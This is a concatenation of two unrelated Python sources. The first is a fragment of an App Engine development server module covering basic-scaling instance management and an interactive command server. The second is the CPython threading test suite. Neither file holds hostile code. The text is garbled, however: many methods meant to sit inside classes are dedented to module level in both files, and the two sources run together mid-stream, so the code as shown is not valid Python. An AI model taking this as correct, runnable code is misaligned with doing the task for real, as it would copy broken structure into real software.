               use_mtime_file_watcher,
               automatic_restarts,
               allow_skipped_files):
    """Initializer for BasicScalingServer.

    Args:
      server_configuration: An application_configuration.ServerConfiguration
          instance storing the configuration data for a server.
      host: A string containing the host that any HTTP servers should bind to
          e.g. "localhost".
      balanced_port: An int specifying the port where the balanced server for
          the pool should listen.
      api_port: The port that APIServer listens for RPC requests on.
      auth_domain: A string containing the auth domain to set in the
          environment variables.
      runtime_stderr_loglevel: An int representing the minimum logging level
          at which runtime log messages should be written to stderr. See
          devappserver2.py for possible values.
      php_executable_path: A string containing the path to PHP execution e.g.
          "/usr/bin/php-cgi".
      enable_php_remote_debugging: A boolean indicating whether the PHP
          interpreter should be started with XDebug remote debugging enabled.
      python_config: A runtime_config_pb2.PythonConfig instance containing
          Python runtime-specific configuration. If None then defaults are
          used.
      cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
          required configuration for local Google Cloud SQL development. If
          None then Cloud SQL will not be available.
      default_version_port: An int containing the port of the default version.
      port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
          with a mapping of port to Server and Instance.
      request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
          with request information for use by API stubs.
      dispatcher: A Dispatcher instance that can be used to make HTTP requests.
      max_instances: The maximum number of instances to create for this server.
          If None then there is no limit on the number of created instances.
      use_mtime_file_watcher: A bool containing whether to use mtime polling
          to monitor file changes even if other options are available on the
          current platform.
      automatic_restarts: If True then instances will be restarted when a
          file or configuration change that affects them is detected.
      allow_skipped_files: If True then all files in the application's
          directory are readable, even if they appear in a static handler or
          "skip_files" directive.
    """
    super(BasicScalingServer, self).__init__(server_configuration,
                                             host,
                                             balanced_port,
                                             api_port,
                                             auth_domain,
                                             runtime_stderr_loglevel,
                                             php_executable_path,
                                             enable_php_remote_debugging,
                                             python_config,
                                             cloud_sql_config,
                                             default_version_port,
                                             port_registry,
                                             request_data,
                                             dispatcher,
                                             max_instances,
                                             use_mtime_file_watcher,
                                             automatic_restarts,
                                             allow_skipped_files)
    self._process_basic_scaling(server_configuration.basic_scaling)

    self._instances = []  # Protected by self._condition.
    self._wsgi_servers = []  # Protected by self._condition.
    # A list of booleans signifying whether the corresponding instance in
    # self._instances has been or is being started.
    self._instance_running = []  # Protected by self._condition.

    # Basic scaling pre-creates the full complement of (stopped) instances;
    # they are started lazily on demand.
    for instance_id in xrange(self._max_instances):
      inst = self._instance_factory.new_instance(instance_id,
                                                 expect_ready_request=True)
      self._instances.append(inst)
      self._wsgi_servers.append(wsgi_server.WsgiServer(
          (self._host, 0), functools.partial(self._handle_request, inst=inst)))
      self._instance_running.append(False)

    self._condition = threading.Condition()  # Protects instance state.

    # Background thread handling file changes and idle-timeout shutdowns;
    # started in start().
    self._change_watcher_thread = threading.Thread(
        target=self._loop_watching_for_changes_and_idle_instances)
def start(self):
  """Start background management of the Server.

  Brings up the load-balanced HTTP server, registers its port, starts the
  file watcher (if configured) and the change/idle-instance watcher thread,
  then starts one WSGI server per pre-created instance so every instance is
  individually addressable.
  """
  self._balanced_server.start()
  self._port_registry.add(self.balanced_port, self, None)
  if self._watcher:
    self._watcher.start()
  self._change_watcher_thread.start()
  for wsgi_servr, inst in zip(self._wsgi_servers, self._instances):
    wsgi_servr.start()
    # Register each per-instance port so the dispatcher can route requests
    # addressed to a specific instance directly to it.
    self._port_registry.add(wsgi_servr.port, self, inst)
def quit(self):
  """Stops the Server.

  Shutdown order matters: the change-watcher thread is joined before the
  watcher and the balanced server are stopped because it depends on both.
  Instances are force-quit last, after being detached from self._instances.
  """
  self._quit_event.set()
  self._change_watcher_thread.join()
  # The instance adjustment thread depends on the balanced server and the
  # watcher so wait for it to exit before quitting them.
  if self._watcher:
    self._watcher.quit()
  self._balanced_server.quit()
  for wsgi_servr in self._wsgi_servers:
    wsgi_servr.quit()
  with self._condition:
    instances = self._instances
    self._instances = []
    # Wake any threads blocked waiting for an instance to become available.
    self._condition.notify_all()
  for inst in instances:
    inst.quit(force=True)
def get_instance_port(self, instance_id):
  """Returns the port of the HTTP server for an instance.

  Args:
    instance_id: The id (an int or numeric string) of the instance.

  Returns:
    An int containing the port of the instance's WSGI server.

  Raises:
    request_info.InvalidInstanceIdError: if the id is non-numeric or out of
        range.
  """
  try:
    index = int(instance_id)
  except ValueError:
    raise request_info.InvalidInstanceIdError()
  with self._condition:
    # Reject negative and out-of-range ids; a negative index would
    # otherwise silently address an instance from the end of the list.
    if not 0 <= index < len(self._instances):
      raise request_info.InvalidInstanceIdError()
    wsgi_servr = self._wsgi_servers[index]
  return wsgi_servr.port
@property
def instances(self):
  """A set of all the instances currently in the Server."""
  # Snapshot under the condition lock so callers get a consistent copy even
  # while restart()/quit() are mutating self._instances.
  with self._condition:
    return set(self._instances)
def _handle_instance_request(self,
                             environ,
                             start_response,
                             url_map,
                             match,
                             request_id,
                             inst,
                             request_type):
  """Handles a request routed to a particular Instance.

  Retries handing the request to the instance until it is accepted, the
  instance quits, or _MAX_REQUEST_WAIT_TIME elapses. If the target instance
  is not yet running, this thread starts it (synchronously) so the request
  can eventually be served.

  Args:
    environ: An environ dict for the request as defined in PEP-333.
    start_response: A function with semantics defined in PEP-333.
    url_map: An appinfo.URLMap instance containing the configuration for the
        handler that matched.
    match: A re.MatchObject containing the result of the matched URL pattern.
    request_id: A unique string id associated with the request.
    inst: The instance.Instance to send the request to.
    request_type: The type of the request. See instance.*_REQUEST module
        constants.

  Returns:
    An iterable over strings containing the body of the HTTP response.
  """
  instance_id = inst.instance_id
  start_time = time.time()
  timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
  try:
    while time.time() < timeout_time:
      logging.debug('Dispatching request to %s after %0.4fs pending',
                    inst, time.time() - start_time)
      try:
        return inst.handle(environ, start_response, url_map, match,
                           request_id, request_type)
      except instance.CannotAcceptRequests:
        # Instance is busy or not ready yet; fall through and retry.
        pass
      if inst.has_quit:
        return self._error_response(environ, start_response, 503)
      # Decide under the lock whether this thread is responsible for
      # starting the instance; only one caller may flip the flag.
      with self._condition:
        if self._instance_running[instance_id]:
          should_start = False
        else:
          self._instance_running[instance_id] = True
          should_start = True
      if should_start:
        self._start_instance(instance_id)
      else:
        # Another thread is starting it; wait until it can take requests.
        inst.wait(timeout_time)
    else:
      # while loop exhausted its deadline without dispatching the request.
      return self._error_response(environ, start_response, 503)
  finally:
    # Wake one waiter; a slot may have been freed by this request.
    with self._condition:
      self._condition.notify()
def _handle_script_request(self,
                           environ,
                           start_response,
                           url_map,
                           match,
                           request_id,
                           inst=None,
                           request_type=instance.NORMAL_REQUEST):
  """Handles an HTTP request that has matched a script handler.

  Args:
    environ: An environ dict for the request as defined in PEP-333.
    start_response: A function with semantics defined in PEP-333.
    url_map: An appinfo.URLMap instance containing the configuration for the
        handler that matched.
    match: A re.MatchObject containing the result of the matched URL pattern.
    request_id: A unique string id associated with the request.
    inst: The instance.Instance to send the request to. If None then an
        appropriate instance.Instance will be chosen.
    request_type: The type of the request. See instance.*_REQUEST module
        constants.

  Returns:
    An iterable over strings containing the body of the HTTP response.
  """
  if self._quit_event.is_set():
    return self._error_response(environ, start_response, 404)
  # Expose the backend identity to the runtime via the WSGI environ.
  if self._server_configuration.is_backend:
    environ['BACKEND_ID'] = self._server_configuration.server_name
  else:
    environ['BACKEND_ID'] = (
        self._server_configuration.version_id.split('.', 1)[0])
  if inst is not None:
    # Caller pinned the request to a specific instance.
    return self._handle_instance_request(
        environ, start_response, url_map, match, request_id, inst,
        request_type)
  start_time = time.time()
  timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
  while time.time() < timeout_time:
    if self._quit_event.is_set():
      return self._error_response(environ, start_response, 404)
    inst = self._choose_instance(timeout_time)
    if inst:
      try:
        logging.debug('Dispatching request to %s after %0.4fs pending',
                      inst, time.time() - start_time)
        return inst.handle(environ, start_response, url_map, match,
                           request_id, request_type)
      except instance.CannotAcceptRequests:
        # Chosen instance filled up in the meantime; pick another.
        continue
      finally:
        with self._condition:
          self._condition.notify()
  else:
    # Deadline expired without any instance accepting the request.
    return self._error_response(environ, start_response, 503)
def _start_any_instance(self):
  """Choose an inactive instance and start it asynchronously.

  Returns:
    An instance.Instance that will be started asynchronously or None if all
    instances are already running.
  """
  with self._condition:
    # Claim the first not-yet-running slot under the lock so two callers
    # cannot start the same instance.
    for instance_id, running in enumerate(self._instance_running):
      if not running:
        self._instance_running[instance_id] = True
        inst = self._instances[instance_id]
        break
    else:
      # Every instance is already running (or being started).
      return None
  self._async_start_instance(instance_id)
  return inst
def _async_start_instance(self, instance_id):
  # Kick off _start_instance on the shared thread pool so the caller does
  # not block on instance startup (which sends an /_ah/start request).
  _THREAD_POOL.submit(self._start_instance, instance_id)
def _start_instance(self, instance_id):
  """Starts the instance with the given id and sends it an /_ah/start request.

  No-op if the server is quitting. After a successful runtime start, a
  READY_REQUEST ("/_ah/start") is dispatched to the instance and waiting
  request threads are notified that capacity is available.

  Args:
    instance_id: An int index into self._instances/self._wsgi_servers.
  """
  with self._condition:
    if self._quit_event.is_set():
      return
    wsgi_servr = self._wsgi_servers[instance_id]
    inst = self._instances[instance_id]
  if inst.start():
    logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
                  wsgi_servr.port)
    try:
      # 0.1.0.3 is the sentinel address App Engine uses for internally
      # generated requests.
      environ = self.build_request_environ(
          'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
          fake_login=True)
      self._handle_request(environ,
                           start_response_utils.null_start_response,
                           inst=inst,
                           request_type=instance.READY_REQUEST)
      logging.debug('Sent start request: %s', inst)
      with self._condition:
        # Wake up to one waiter per request slot the new instance offers.
        self._condition.notify(self.max_instance_concurrent_requests)
    except Exception:
      # Narrowed from a bare "except:" so SystemExit/KeyboardInterrupt are
      # not swallowed; best-effort logging is kept for real errors.
      logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
  """Returns an Instance to handle a request or None if all are busy."""
  with self._condition:
    while time.time() < timeout_time and not self._quit_event.is_set():
      for inst in self._instances:
        if inst.can_accept_requests:
          return inst
      else:
        # No running instance has capacity: try to bring up an idle one;
        # otherwise block until notified (or the remaining time elapses).
        inst = self._start_any_instance()
        if inst:
          break
        # NOTE(review): timeout_time - time.time() can be very small or
        # negative near the deadline; Condition.wait treats that as an
        # immediate return, so the loop still terminates.
        self._condition.wait(timeout_time - time.time())
    else:
      # Deadline reached or server quitting without finding an instance.
      return None
  if inst:
    # Wait (outside the lock) for the freshly started instance to be ready.
    inst.wait(timeout_time)
  return inst
def _handle_changes(self):
  """Handle file or configuration changes."""
  # Always check for config and file changes because checking also clears
  # pending changes.
  config_changes = self._server_configuration.check_for_updates()
  has_file_changes = self._watcher.has_changes()

  if application_configuration.HANDLERS_CHANGED in config_changes:
    # Handler config can be applied without restarting instances; swap the
    # handler table atomically under its lock.
    handlers = self._create_url_handlers()
    with self._handler_lock:
      self._handlers = handlers

  if has_file_changes:
    self._instance_factory.files_changed()

  if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
    self._instance_factory.configuration_changed(config_changes)

  # Only changes in this set (or file edits) force a full instance restart.
  if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
    self.restart()
def _loop_watching_for_changes_and_idle_instances(self):
  """Loops until the InstancePool is done watching for file changes.

  Runs on the background watcher thread: roughly once per second it shuts
  down idle instances and, when automatic restarts are enabled, applies any
  pending file/configuration changes.
  """
  while not self._quit_event.is_set():
    if self.ready:
      self._shutdown_idle_instances()
    if self._automatic_restarts:
      self._handle_changes()
    # Sleep up to a second, but wake immediately when quit() is called.
    self._quit_event.wait(timeout=1)
def _shutdown_idle_instances(self):
  # Replace every instance that has been idle longer than the configured
  # timeout with a fresh, not-yet-started instance; the old ones are stopped
  # after the lock is released so quitting never blocks other threads.
  instances_to_stop = []
  with self._condition:
    for instance_id, inst in enumerate(self._instances):
      if (self._instance_running[instance_id] and
          inst.idle_seconds > self._instance_idle_timeout):
        instances_to_stop.append((self._instances[instance_id],
                                  self._wsgi_servers[instance_id]))
        self._instance_running[instance_id] = False
        new_instance = self._instance_factory.new_instance(
            instance_id, expect_ready_request=True)
        self._instances[instance_id] = new_instance
        # Re-point the slot's WSGI server at the replacement instance and
        # refresh the port registry mapping.
        wsgi_servr = self._wsgi_servers[instance_id]
        wsgi_servr.set_app(
            functools.partial(self._handle_request, inst=new_instance))
        self._port_registry.add(wsgi_servr.port, self, new_instance)
  for inst, wsgi_servr in instances_to_stop:
    logging.debug('Shutting down %r', inst)
    self._stop_instance(inst, wsgi_servr)
def _stop_instance(self, inst, wsgi_servr):
  # Ask the instance to shut down gracefully (/_ah/stop is expected), then
  # finish the shutdown asynchronously so this thread is not blocked.
  inst.quit(expect_shutdown=True)
  self._async_shutdown_instance(inst, wsgi_servr.port)
def restart(self):
  """Restarts the server, replacing all running instances."""
  instances_to_stop = []
  instances_to_start = []
  with self._condition:
    if self._quit_event.is_set():
      return
    # Swap every *running* instance for a fresh one under the lock; actual
    # start/stop happens afterwards so the lock is held only briefly.
    for instance_id, inst in enumerate(self._instances):
      if self._instance_running[instance_id]:
        instances_to_stop.append((inst, self._wsgi_servers[instance_id]))
        new_instance = self._instance_factory.new_instance(
            instance_id, expect_ready_request=True)
        self._instances[instance_id] = new_instance
        instances_to_start.append(instance_id)
        wsgi_servr = self._wsgi_servers[instance_id]
        wsgi_servr.set_app(
            functools.partial(self._handle_request, inst=new_instance))
        self._port_registry.add(wsgi_servr.port, self, new_instance)
  for instance_id in instances_to_start:
    self._async_start_instance(instance_id)
  for inst, wsgi_servr in instances_to_stop:
    self._stop_instance(inst, wsgi_servr)
def get_instance(self, instance_id):
  """Returns the instance with the provided instance ID.

  Raises:
    request_info.InvalidInstanceIdError: if instance_id is non-numeric,
        negative beyond list bounds, or out of range.
  """
  try:
    with self._condition:
      # NOTE(review): a small negative int (e.g. -1) indexes from the end
      # of the list rather than raising — presumably callers never pass
      # negative ids; verify against the dispatcher.
      return self._instances[int(instance_id)]
  except (ValueError, IndexError):
    raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
  # WSGI entry point: delegate to the request-handling pipeline, optionally
  # pinned to a specific instance.
  return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
  # Basic-scaling servers run a dedicated WSGI server per instance, so each
  # instance can be addressed directly by port.
  return True
class InteractiveCommandServer(Server):
  """A Server that can evaluate user commands.

  This server manages a single Instance which is started lazily.
  """

  _MAX_REQUEST_WAIT_TIME = 15

  def __init__(self,
               server_configuration,
               host,
               balanced_port,
               api_port,
               auth_domain,
               runtime_stderr_loglevel,
               php_executable_path,
               enable_php_remote_debugging,
               python_config,
               cloud_sql_config,
               default_version_port,
               port_registry,
               request_data,
               dispatcher,
               use_mtime_file_watcher,
               allow_skipped_files):
    """Initializer for InteractiveCommandServer.

    Args:
      server_configuration: An application_configuration.ServerConfiguration
          instance storing the configuration data for this server.
      host: A string containing the host that will be used when constructing
          HTTP headers sent to the Instance executing the interactive command
          e.g. "localhost".
      balanced_port: An int specifying the port that will be used when
          constructing HTTP headers sent to the Instance executing the
          interactive command e.g. "localhost".
      api_port: The port that APIServer listens for RPC requests on.
      auth_domain: A string containing the auth domain to set in the environment
          variables.
      runtime_stderr_loglevel: An int reprenting the minimum logging level at
          which runtime log messages should be written to stderr. See
          devappserver2.py for possible values.
      php_executable_path: A string containing the path to PHP execution e.g.
          "/usr/bin/php-cgi".
      enable_php_remote_debugging: A boolean indicating whether the PHP
          interpreter should be started with XDebug remote debugging enabled.
      python_config: A runtime_config_pb2.PythonConfig instance containing
          Python runtime-specific configuration. If None then defaults are
          used.
      cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
          required configuration for local Google Cloud SQL development. If None
          then Cloud SQL will not be available.
      default_version_port: An int containing the port of the default version.
      port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
          with a mapping of port to Server and Instance.
      request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
          with request information for use by API stubs.
      dispatcher: A Dispatcher instance that can be used to make HTTP requests.
      use_mtime_file_watcher: A bool containing whether to use mtime polling to
          monitor file changes even if other options are available on the
          current platform.
      allow_skipped_files: If True then all files in the application's directory
          are readable, even if they appear in a static handler or "skip_files"
          directive.
    """
    super(InteractiveCommandServer, self).__init__(
        server_configuration,
        host,
        balanced_port,
        api_port,
        auth_domain,
        runtime_stderr_loglevel,
        php_executable_path,
        enable_php_remote_debugging,
        python_config,
        cloud_sql_config,
        default_version_port,
        port_registry,
        request_data,
        dispatcher,
        max_instances=1,
        use_mtime_file_watcher=use_mtime_file_watcher,
        automatic_restarts=True,
        allow_skipped_files=allow_skipped_files)
    # Use a single instance so that state is consistent across requests.
    self._inst_lock = threading.Lock()
    self._inst = None

  @property
  def balanced_port(self):
    """The port that the balanced HTTP server for the Server is listening on.

    The InteractiveCommandServer does not actually listen on this port but it is
    used when constructing the "SERVER_PORT" in the WSGI-environment.
    """
    return self._balanced_port

  def quit(self):
    """Stops the InteractiveCommandServer."""
    if self._inst:
      self._inst.quit(force=True)
      self._inst = None

  def _handle_script_request(self,
                             environ,
                             start_response,
                             url_map,
                             match,
                             request_id,
                             inst=None,
                             request_type=instance.INTERACTIVE_REQUEST):
    """Handles a interactive request by forwarding it to the managed Instance.

    Args:
      environ: An environ dict for the request as defined in PEP-333.
      start_response: A function with semantics defined in PEP-333.
      url_map: An appinfo.URLMap instance containing the configuration for the
          handler that matched.
      match: A re.MatchObject containing the result of the matched URL pattern.
      request_id: A unique string id associated with the request.
      inst: The instance.Instance to send the request to.
      request_type: The type of the request. See instance.*_REQUEST module
          constants. This must be instance.INTERACTIVE_REQUEST.

    Returns:
      An iterable over strings containing the body of the HTTP response.
    """
    assert inst is None
    assert request_type == instance.INTERACTIVE_REQUEST
    start_time = time.time()
    timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
    while time.time() < timeout_time:
      new_instance = False
      with self._inst_lock:
        # Lazily create the single shared instance on first use.
        if not self._inst:
          self._inst = self._instance_factory.new_instance(
              AutoScalingServer.generate_instance_id(),
              expect_ready_request=False)
          new_instance = True
        inst = self._inst

      if new_instance:
        self._inst.start()

      try:
        return inst.handle(environ, start_response, url_map, match,
                           request_id, request_type)
      except instance.CannotAcceptRequests:
        # Another command is still executing; wait for capacity.
        inst.wait(timeout_time)
      except Exception:
        # If the instance is restarted while handling a request then the
        # exception raised is unpredictable.
        if inst != self._inst:
          start_response('503 Service Unavailable', [])
          return ['Instance was restarted while executing command']
        logging.exception('Unexpected exception handling command: %r', environ)
        raise
    else:
      start_response('503 Service Unavailable', [])
      return ['The command timed-out while waiting for another one to complete']

  def restart(self):
    """Restarts the server."""
    with self._inst_lock:
      if self._inst:
        self._inst.quit(force=True)
        self._inst = None

  def send_interactive_command(self, command):
    """Sends an interactive command to the server.

    Args:
      command: The command to send e.g. "print 5+5".

    Returns:
      A string representing the result of the command e.g. "10\n".

    Raises:
      InteractiveCommandError: if the command failed for any reason.
    """
    start_response = start_response_utils.CapturingStartResponse()

    # 192.0.2.0 is an example address defined in RFC 5737.
    environ = self.build_request_environ(
        'POST', '/', [], command, '192.0.2.0', self.balanced_port)

    try:
      response = self._handle_request(
          environ,
          start_response,
          request_type=instance.INTERACTIVE_REQUEST)
    except Exception as e:
      # Bug fix: previously two arguments were passed to the exception
      # constructor, so the message rendered as a tuple repr instead of
      # including the failure text.
      raise InteractiveCommandError('Unexpected command failure: ' + str(e))

    if start_response.status != '200 OK':
      raise InteractiveCommandError(start_response.merged_response(response))

    return start_response.merged_response(response)
|
test_threading.py | """
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
# Compared against sys.platform by the @skipIf decorators below.
platforms_to_skip = ('netbsd5', 'hp-ux11')
class Counter(object):
    """A trivial mutable counter shared between test threads."""

    def __init__(self):
        # Current count; starts at zero.
        self.value = 0

    def inc(self):
        """Increase the count by one."""
        self.value = self.value + 1

    def dec(self):
        """Decrease the count by one."""
        self.value = self.value - 1

    def get(self):
        """Return the current count."""
        return self.value
class TestThread(threading.Thread):
    """Worker thread used by ThreadTests.test_various_ops.

    Acquires a shared bounded semaphore, bumps a shared counter (protected by
    a mutex), asserts that the concurrency bound holds, sleeps a random tiny
    delay, then decrements the counter on the way out.
    """

    def __init__(self, name, testcase, sema, mutex, nrunning):
        threading.Thread.__init__(self, name=name)
        # The TestCase whose assert* methods this worker calls.
        self.testcase = testcase
        # BoundedSemaphore limiting how many workers run concurrently.
        self.sema = sema
        # Lock guarding nrunning.
        self.mutex = mutex
        # Shared Counter of currently running workers.
        self.nrunning = nrunning

    def run(self):
        delay = random.random() / 10000.0
        if verbose:
            print('task %s will run for %.1f usec' %
                  (self.name, delay * 1e6))

        with self.sema:
            with self.mutex:
                self.nrunning.inc()
                if verbose:
                    print(self.nrunning.get(), 'tasks are running')
                # The semaphore bounds concurrency at 3.
                self.testcase.assertLessEqual(self.nrunning.get(), 3)

            time.sleep(delay)
            if verbose:
                print('task', self.name, 'done')

            with self.mutex:
                self.nrunning.dec()
                # The count can never go negative.
                self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
                if verbose:
                    print('%s is finished. %d tasks are running' %
                          (self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
    """Base class that snapshots thread state and restores it after each test.

    Ensures tests do not leak threads or child processes into later tests.
    """

    def setUp(self):
        # Record the live-thread baseline so tearDown can detect leaks.
        self._threads = test.support.threading_setup()

    def tearDown(self):
        test.support.threading_cleanup(*self._threads)
        # Reap any forked children so they don't outlive the test.
        test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
    # This takes about n/3 seconds to run (about n/3 clumps of tasks,
    # times about 1 second per clump).
    NUMTASKS = 10

    # no more than 3 of the 10 can run at once
    sema = threading.BoundedSemaphore(value=3)
    mutex = threading.RLock()
    numrunning = Counter()

    threads = []

    for i in range(NUMTASKS):
        t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
        threads.append(t)
        # Before start(): no ident and repr reports the "initial" state.
        self.assertIsNone(t.ident)
        self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
        t.start()

    if hasattr(threading, 'get_native_id'):
        # Where supported, every thread (plus main) has a distinct OS id.
        native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
        self.assertNotIn(None, native_ids)
        self.assertEqual(len(native_ids), NUMTASKS + 1)

    if verbose:
        print('waiting for all tasks to complete')
    for t in threads:
        t.join()
        self.assertFalse(t.is_alive())
        # After join(): ident persists and repr reports "stopped".
        self.assertNotEqual(t.ident, 0)
        self.assertIsNotNone(t.ident)
        self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
    if verbose:
        print('all tasks done')
    # Every worker decremented on exit, so the counter returns to zero.
    self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
    # The ident still must work for the main thread and dummy threads.
    self.assertIsNotNone(threading.currentThread().ident)

    def f():
        # Inside a raw _thread-started thread, currentThread() returns a
        # _DummyThread whose ident must match the _thread-level tid.
        ident.append(threading.currentThread().ident)
        done.set()

    done = threading.Event()
    ident = []
    with support.wait_threads_exit():
        tid = _thread.start_new_thread(f, ())
        done.wait()
        self.assertEqual(ident[0], tid)
    # Kill the "immortal" _DummyThread
    del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
    if verbose:
        print('with 256 KiB thread stack size...')
    try:
        threading.stack_size(262144)
    except _thread.error:
        raise unittest.SkipTest(
            'platform does not support changing thread stack size')
    # Re-run the full ops test with the reduced stack size.
    self.test_various_ops()
    # Restore the platform default.
    threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
    if verbose:
        print('with 1 MiB thread stack size...')
    try:
        threading.stack_size(0x100000)
    except _thread.error:
        raise unittest.SkipTest(
            'platform does not support changing thread stack size')
    # Re-run the full ops test with the enlarged stack size.
    self.test_various_ops()
    # Restore the platform default.
    threading.stack_size(0)
def test_foreign_thread(self):
    # Check that a "foreign" thread can use the threading module.
    def f(mutex):
        # Calling current_thread() forces an entry for the foreign
        # thread to get made in the threading._active map.
        threading.current_thread()
        mutex.release()

    # The mutex doubles as a completion signal: the worker releases it.
    mutex = threading.Lock()
    mutex.acquire()
    with support.wait_threads_exit():
        tid = _thread.start_new_thread(f, (mutex,))
        # Wait for the thread to finish.
        mutex.acquire()
    self.assertIn(tid, threading._active)
    self.assertIsInstance(threading._active[tid], threading._DummyThread)
    #Issue 29376
    self.assertTrue(threading._active[tid].is_alive())
    self.assertRegex(repr(threading._active[tid]), '_DummyThread')
    del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level.  This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
    ctypes = import_module("ctypes")

    set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
    set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)

    class AsyncExc(Exception):
        pass

    exception = ctypes.py_object(AsyncExc)

    # First check it works when setting the exception from the same thread.
    tid = threading.get_ident()
    self.assertIsInstance(tid, int)
    self.assertGreater(tid, 0)

    try:
        result = set_async_exc(tid, exception)
        # The exception is async, so we might have to keep the VM busy until
        # it notices.
        while True:
            pass
    except AsyncExc:
        pass
    else:
        # This code is unreachable but it reflects the intent. If we wanted
        # to be smarter the above loop wouldn't be infinite.
        self.fail("AsyncExc not raised")
    try:
        self.assertEqual(result, 1) # one thread state modified
    except UnboundLocalError:
        # The exception was raised too quickly for us to get the result.
        pass

    # `worker_started` is set by the thread when it's inside a try/except
    # block waiting to catch the asynchronously set AsyncExc exception.
    # `worker_saw_exception` is set by the thread upon catching that
    # exception.
    worker_started = threading.Event()
    worker_saw_exception = threading.Event()

    class Worker(threading.Thread):
        def run(self):
            self.id = threading.get_ident()
            self.finished = False

            try:
                while True:
                    worker_started.set()
                    time.sleep(0.1)
            except AsyncExc:
                self.finished = True
                worker_saw_exception.set()

    t = Worker()
    t.daemon = True # so if this fails, we don't hang Python at shutdown
    t.start()
    if verbose:
        print("    started worker thread")

    # Try a thread id that doesn't make sense.
    if verbose:
        print("    trying nonsensical thread id")
    result = set_async_exc(-1, exception)
    self.assertEqual(result, 0)  # no thread states modified

    # Now raise an exception in the worker thread.
    if verbose:
        print("    waiting for worker thread to get started")
    ret = worker_started.wait()
    self.assertTrue(ret)
    if verbose:
        print("    verifying worker hasn't exited")
    self.assertFalse(t.finished)
    if verbose:
        print("    attempting to raise asynch exception in worker")
    result = set_async_exc(t.id, exception)
    self.assertEqual(result, 1) # one thread state modified
    if verbose:
        print("    waiting for worker to say it caught the exception")
    worker_saw_exception.wait(timeout=10)
    self.assertTrue(t.finished)
    if verbose:
        print("    all OK -- joining worker")
    if t.finished:
        t.join()
    # else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
    # Issue 7481: Failure to start thread should cleanup the limbo map.
    def fail_new_thread(*args):
        raise threading.ThreadError()
    # Monkey-patch the low-level thread starter so Thread.start() fails.
    _start_new_thread = threading._start_new_thread
    threading._start_new_thread = fail_new_thread
    try:
        t = threading.Thread(target=lambda: None)
        self.assertRaises(threading.ThreadError, t.start)
        self.assertFalse(
            t in threading._limbo,
            "Failed to cleanup _limbo map on failure of Thread.start().")
    finally:
        # Always restore the real starter, even if assertions fail.
        threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
    # Issue 1402: the PyGILState_Ensure / _Release functions may be called
    # very late on python exit: on deallocation of a running thread for
    # example.
    import_module("ctypes")

    # The child exits with 42 via sys.exit while the worker still runs; a
    # crash during late finalization would change the return code.
    rc, out, err = assert_python_failure("-c", """if 1:
        import ctypes, sys, time, _thread

        # This lock is used as a simple event variable.
        ready = _thread.allocate_lock()
        ready.acquire()

        # Module globals are cleared before __del__ is run
        # So we save the functions in class dict
        class C:
            ensure = ctypes.pythonapi.PyGILState_Ensure
            release = ctypes.pythonapi.PyGILState_Release
            def __del__(self):
                state = self.ensure()
                self.release(state)

        def waitingThread():
            x = C()
            ready.release()
            time.sleep(100)

        _thread.start_new_thread(waitingThread, ())
        ready.acquire()  # Be sure the other thread is waiting.
        sys.exit(42)
        """)
    self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
    # Issue1733757
    # Avoid a deadlock when sys.settrace steps into threading._shutdown
    assert_python_ok("-c", """if 1:
        import sys, threading

        # A deadlock-killer, to prevent the
        # testsuite to hang forever
        def killer():
            import os, time
            time.sleep(2)
            print('program blocked; aborting')
            os._exit(2)
        t = threading.Thread(target=killer)
        t.daemon = True
        t.start()

        # This is the trace function
        def func(frame, event, arg):
            threading.current_thread()
            return func

        sys.settrace(func)
        """)
def test_join_nondaemon_on_shutdown(self):
    # Issue 1722344
    # Raising SystemExit skipped threading._shutdown
    rc, out, err = assert_python_ok("-c", """if 1:
            import threading
            from time import sleep

            def child():
                sleep(1)
                # As a non-daemon thread we SHOULD wake up and nothing
                # should be torn down yet
                print("Woke up, sleep function is:", sleep)

            threading.Thread(target=child).start()
            raise SystemExit
        """)
    # If _shutdown ran, the interpreter waited for the child and its
    # globals (sleep) were still intact when it printed.
    self.assertEqual(out.strip(),
        b"Woke up, sleep function is: <built-in function sleep>")
    self.assertEqual(err, b"")
